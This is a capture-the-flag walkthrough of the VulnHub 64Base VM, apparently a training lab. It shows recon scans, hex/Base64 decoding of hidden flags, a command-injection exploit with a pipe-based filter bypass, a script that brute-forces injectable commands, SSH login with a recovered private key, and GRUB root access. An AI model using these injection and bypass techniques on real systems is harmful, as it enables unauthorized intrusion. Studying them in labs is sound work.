VulnHub: a simple solution to 64Base: Boot2Root

VulnHub recently published a new image called 64Base Boot2Root. The challenge, like this article, is intended for beginners, so don't be surprised if some of the solutions seem too simple.
Start
In the description you can see the number of flags, and the format is:
There are 6 flags to collect. Each in the format of flag1{ZXhhbXBsZSBmbGFnCg==} Beat the Empire and steal the plans for the Death Star before its too late.
Download the image, import it, open the virtual machine settings, set a network bridge to our adapter under Network, save, and run. Then we look for our machine with Nmap:
sudo nmap -A 192.168.1.1-255 -p1-65535
We get the following output:
Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-12 22:13 MSK
Nmap scan report for 192.168.1.2
Host is up (0.0040 s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http Apache httpd 2.4.10 ((Debian))
4899/tcp open radmin
62964/tcp open ssh OpenSSH 6.7p1 Debian-5+deb8u3 (protocol 2.0)
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)
Nmap successfully identified the services on 2 of the 4 ports, 80 and 62964; the other 2 ports were not identified. More on them later.
flag1
Go to the address 192.168.1.2:80 and get to the main page.

There the inscription dmlldyBzb3VyY2UgO0QK catches the eye.
Decode it from Base64 and obtain a hint: view source ;D
OK, look at the source of the page, and next to this inscription we see the comment:
<div class="site-heading">
<h1>64base</h1>
<hr class="small">
<span class="subheading">dmlldyBzb3VyY2UgO0QK</span>
<!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->
</div>
After converting HEX → ASCII → Base64 → ASCII, we get the first flag:
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
Converting the flag body from Base64 to ASCII yields credentials:
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
flag2
So we have a username and a presumed password. We look for available files and directories:
sudo dirsearch -r -u http://192.168.1.2 -e php,txt,bak -w /usr/share/dirb/wordlists/big.txt -f -x 301,403

We found a page with Basic authorization, /admin. The credentials found in the last flag did not fit, and connecting over SSH with them failed too. Apparently something was missed. After a brief search, it was decided to parse the words from the pages of the website into a separate dictionary. A Python script helped:
#!/usr/bin/python3
import re
import requests
import sys

def repl(txt):
    # Strip markup and punctuation so that only bare words remain
    txt = txt.replace('<!', '').replace('>', ' ').replace('</', ' ').replace('\n', ' ').replace('<', ' ').replace('"', ' ').replace('=', ' ').replace(':', ' ').replace('--', ' ').replace('/', ' ').replace("'", " ").replace('©', ' ').replace(',', ' ').replace('#', ' ').replace('→a', ' ').replace('?', '').replace('.', '').replace(';', ' ').replace('(', ' ').replace(')', ' ').replace('{', ' ').replace('}', ' ')
    return txt.strip()

words = []
url = sys.argv[1]
req = requests.get(url).text.splitlines()
for item in req:
    item = repl(item)
    tmp = [x.strip() for x in item.split(' ') if x.strip() != '']
    for word in tmp:
        if word not in words: words.append(word)
# Write the unique words to the output file, one per line
w = open(sys.argv[2], 'w')
for x in words:
    w.write('%s\n' %(x))
w.close()
Run it for each page we found:
./parser.py http://192.168.1.2/index.html index
./parser.py http://192.168.1.2/about.html about
./parser.py http://192.168.1.2/post.html post
./parser.py http://192.168.1.2/contact.html contact
cat index contact about post | sort -u > words.lst
Run the directory search again:
sudo dirsearch -u http://192.168.1.2/ -r -f -w words.lst -e php,txt,json,bak -x 301

Another interesting directory turned up. If you look at the file robots.txt, you will find the entry:
Disallow: /Imperial-class/
Apparently this is one of the author's jokes mentioned in the description. Visiting it prompts for authentication; we enter the login name and password obtained earlier, and we are in!
However, it was too early to rejoice. We were greeted by the message:
[] ERROR: incorrect path!.. TO THE DARK SIDE!
Looking at Imperial-class I, we find the phrase:
Hmm, trying to go to 192.168.1.2/Imperial-Class/BountyHunter, we get to another login page:

Looking at the source code, we see the next encoded flag:
<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php">
<fieldset>
<legend>Please login:</legend>
<dl>
<dt>
<label title="Username">Username:
<input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
</label>
</dt>
</dl>
<dl>
<dt>
<label title="Password">Password:
<input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
</label>
</dt>
</dl>
<dl>
<dt>
<label title="Submit">
<input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
<!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
</label>
</dt>
</dl>
</fieldset>
</form>
Combine them, convert HEX -> TEXT -> Base64 -> TEXT, and get the second flag:
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
This time the flag encodes a hint, a link to YouTube.
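The HEX → ASCII → Base64 → ASCII chain used for flag1 and flag2, as an added example that is not part of the original write-up: it peels the encoding layers automatically from the hex strings quoted in the page sources above. The function names are this example's own.

```python
import base64
import binascii
import re
import string

# Hex strings copied from the page sources quoted above.
FLAG1_COMMENT = "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a"
FLAG2_PARTS = [
    "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756",  # username input id
    "584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32",  # password input id
    "52714d544a54626d51315a45566157464655614446525557383966516f3d0a",  # basictoken comment
]
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
PRINTABLE = set(string.printable.encode())


def decode_layer(text):
    """Decode one layer; return (encoding, text) or None if text is not encoded."""
    text = text.strip()
    # Hex digits are also valid Base64 characters, so hex must be tried first.
    decoders = [("hex", bytes.fromhex)] if HEX_RE.fullmatch(text) else []
    decoders.append(("base64", lambda s: base64.b64decode(s, validate=True)))
    for name, decode in decoders:
        try:
            raw = decode(text)
        except (ValueError, binascii.Error):
            continue
        # Accept a layer only if it yields non-empty printable ASCII.
        if raw and all(b in PRINTABLE for b in raw):
            return name, raw.decode("ascii")
    return None


def peel(text):
    """Strip layers until nothing decodes; return (layer names, final text)."""
    layers = []
    while (step := decode_layer(text)) is not None:
        layers.append(step[0])
        text = step[1]
    return layers, text.strip()


def flag_payload(flag):
    """Decode the Base64 body inside flagN{...}; None if the format does not match."""
    m = re.fullmatch(r"flag\d\{([A-Za-z0-9+/=]+)\}", flag)
    return peel(m.group(1))[1] if m else None


if __name__ == "__main__":
    for blob in (FLAG1_COMMENT, "".join(FLAG2_PARTS)):
        layers, flag = peel(blob)
        print(layers, flag, "->", flag_payload(flag))
```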
flag3
Moving on, we have a login form: 192.168.1.2/Imperial-Class/BountyHunter/index.php. After trying several options, you may notice that whenever you send a POST request to login.php, we are redirected to index.php without any error.
Let's look more closely at the redirect using curl:
curl http://192.168.1.2/Imperial-Class/BountyHunter/login.php -H 'Authorization: Basic NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0'
To our surprise, the response contained the next flag:
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
And a new hint encoded in it:
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
flag4
Use the hint from the previous flag and navigate to the URL 192.168.1.2/Imperial-Class/BountyHunter/login.php?f=exec&c=id

Hmm, the picture from the page post.html immediately comes to mind.

Replace exec with system: 192.168.1.2/Imperial-Class/BountyHunter/login.php?f=system&c=id and get a new flag, a hint, and a shell on the virtual machine.

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
In the hint we find new credentials: 64base:64base5h377
flag5
After studying the shell we found for a while, it becomes clear that the list of commands available to run is very limited, and in addition there is a filter on the slash. It remains to determine which commands are available to us.
Create a dictionary to iterate through the available commands:
for item in $(ls /usr/sbin/ && ls /usr/bin/ && ls /sbin/ && ls /bin/); do echo $item >> /tmp/unix_command2.lst; done
sort -u /tmp/unix_command2.lst > unix_command.lst
Then feed this dictionary into a Python script:
#!/usr/bin/python
import requests
import sys, re

url = 'http://192.168.1.2/Imperial-Class/BountyHunter/login.php'
param = {'f':'system', 'c':''}
basic = ('64base', 'Th353@r3N0TdaDr01DzU@reL00K1ing4')
if len(sys.argv) == 1:
    print('Usage: brute_sh.py [wordlist]')
    sys.exit(0)
words = open(sys.argv[1], 'r').read().splitlines()
for item in words:
    # Ask each candidate for its help text; a long response means the command ran
    param['c'] = '%s --help' %(item)
    req = requests.get(url, params=param, auth=basic)
    if len(req.text.splitlines()) > 9:
        print('Found cmd: %s' %(item))
And get this output:
Found cmd: base64
Found cmd: cat
Found cmd: id
Found cmd: locate
Found cmd: ls
Found cmd: nc
Found cmd: ps
Found cmd: w
Found cmd: wget
Found cmd: who
Found cmd: whoami
Not much. However, the | character is not filtered, so by putting it at the beginning of the command we get the opportunity to run any command. After playing with the passed parameters, we arrive at this request:
|locate admin|grep html|xargs find
The output will look like this:
/var/www/html/admin
/var/www/html/admin/index.php
/var/www/html/admin/S3cR37
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
/var/www/html/admin/.htaccess
/var/www/html/admin/.htaccess
/var/www/html/admin/index.php
The flag was found, and with it a new hint: Look Inside! :D
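Why the unfiltered | defeats the restriction, as an added example that is not code from the original write-up or from the VM: naive_filter is a constructed model of such a check (an assumption, since the real login.php logic is not shown here), set beside a stricter parser that refuses shell metacharacters and returns an argv list meant to be run without a shell.

```python
import re
import shlex

# Commands the write-up's brute-force script reported as runnable.
ALLOWED = {"base64", "cat", "id", "locate", "ls", "nc", "ps", "w", "wget", "who", "whoami"}
# Characters a shell treats specially, plus the slash the original filter blocked.
SHELL_META = set("|&;<>$`\\(){}[]*?!~\"'\n/")


def naive_filter(cmd):
    """Constructed model of the weak check (assumption, not the VM's login.php):
    reject '/', then accept if an allowed command name occurs anywhere."""
    if "/" in cmd:
        return False
    return any(re.search(r"\b%s\b" % re.escape(name), cmd) for name in ALLOWED)


def strict_argv(cmd):
    """Return an argv list for subprocess.run(argv) with no shell, or None to refuse."""
    if any(ch in SHELL_META for ch in cmd):
        return None                      # no pipes, substitutions, globs or paths
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED:
        return None                      # the command itself must be allowlisted
    return argv


def compare(cmd):
    """Show how both checks treat one input: (naive accepts?, strict argv or None)."""
    return naive_filter(cmd), strict_argv(cmd)


# Constructed sample inputs; the piped one is the request shown in the write-up.
SAMPLES = ["id", "ls -la", "cat /etc/passwd", "|locate admin|grep html|xargs find"]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-40r naive=%s strict=%s" % ((s,) + compare(s)))
```

Even the strict form still lets a caller pass arbitrary arguments to nc or wget, so mapping requests to fixed actions is safer than exposing command names.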
flag6
We are told to look inside this file. OK, let's do that:
# Copy the file to a directory accessible to us
|locate admin|grep html|xargs find|grep TG|xargs cp -t .
# Change the access permissions
|ls|grep TG|xargs chmod 777
Opened in a browser, the file is a picture:

Run exiftool and look at the metadata of this image:
ExifTool Version Number: 9.46
File Name: flag5{TG9vayBJbnNpZGUhIDpECg==}.jpeg
Directory:.
File Size: 192 kB
File Modification Date/Time: 2016:12:16 05:32:02+03:00
File Access Date/Time: 2016:12:16 05:32:08+03:00
File Inode Change Date/Time: 2016:12:16 05:32:02+03:00
File Permissions: rw-------
File Type: JPEG
MIME Type: image/jpeg
JFIF Version: 1.01
Resolution Unit: inches
X Resolution: 72
Y Resolution: 72
Comment: [hex-encoded value omitted]
Image Width: 960
Image Height: 720
Encoding Process: Baseline DCT, Huffman coding
Bits Per Sample: 8
Color Components: 3
Y Cb Cr Sub Sampling: YCbCr4:4:4 (1 1)
Image Size: 960x720
Copy the contents of the Comment field and perform the same transformation as with the previous flags. This time, instead of a flag, the output is a private RSA key.
Use it to connect via ssh:
ssh root@192.168.1.2 -p 62964 -i key.rsa
The password is easy to guess: it is written on the picture. After a successful connection, we get the last flag:
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxntk1ndu1mza0ztu0nmi3ytrkndq1mtm1n
GU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNgq3ytrkmzu0zddhndkzmtrmntq1ntm0ngu
0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1ndvhnjg0ztu0nmizmtrln2e2mzmzngu3ytu5
MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5nzg0zddhndkzmtrlnme0zdm0ngu2ytq5mza0
ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0zddhntuzmzrmntq1njy4ngu1ndyzmza0ztzhnj
M3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTe3nzu5nte2zjnkmgek}
It encodes the command: base64 -d /var/local/.luke|less.real
And we have root access to the virtual machine. Challenge complete!
P.S. There is at least one more way to pass this lab.
Dirty hack
Immediately after booting the image in VirtualBox, you are presented with a login prompt. During boot you can notice that GRUB is used, so I reboot, wait for the OS selection menu, and change the boot options:

We boot and get root. Looking around the system, we go to the directory of the site
by running the commands:
cd /var/www/html
ls -l | wc -l
We get the number of items in this directory; there turned out to be 443. We still need the admin directory. After reviewing its contents, in the folder S3cR37 we find the second flag.

Here you can also find the password hash for this directory, and the user name:
64base:$apr1$SNPbKyA8$0.2pIMdx4JVVA6jsX/Ru30

Looking at the contents of the file index.html, we get the first flag. Run the command:
grep -r flag3 /var/www/
And we find the third flag.

Similarly, we find the fifth and sixth flags:
root@64base:~# find /var/www/html/ -name flag*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
root@64base:~# grep -r flag6 /
/root/.profile:echo "flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxntk1ndu1mza0ztu0nmi3ytrkndq1mtm1ngu0ndrkn2e0zdu0nwe2otrlndq2yjmwngq3ytrkmzu0zddhndkzmtrmntq1ntm0ngu0ndzimzm0ztzhntk3otrlndq2mzdhngy1ndvhnjg0ztu0nmizmtrln2e2mzmzngu3ytu5mza1otdhnwe2yjrln2e2nzdhngq1ndu5nzg0zddhndkzmtrlnme0zdm0ngu2ytq5mza0ztdhntuzmjrlmzi0ntmyngq3ytyzmzu0zddhntuzmzrmntq1njy4ngu1ndyzmza0ztzhnjm3ytrlndq0zdmyngu3ytrlnmi0zdmynte3nzu5nte2zjnkmgek}"
Finally, from the file /var/www/html/Imperial-Class/BountyHunter/login.php we extract and decode the fourth flag:
$_u = base64_decode('ZWNobyAnPGg0PmZsYWc0e05qUmlZWE5st2pzmfltrnpavfzvtxpjm0nnpt19pc9ond4no2nhdc5yzwfsic9ldgmvaxnzdwu7zgf0ztt1bmftzsatytsvc2jpbi9pzmnvbmzpzybldggwfc91c3ivc2hhcmuvz3jlcc5yzwfsigluzxq7zwnobwo=').' '.$_s;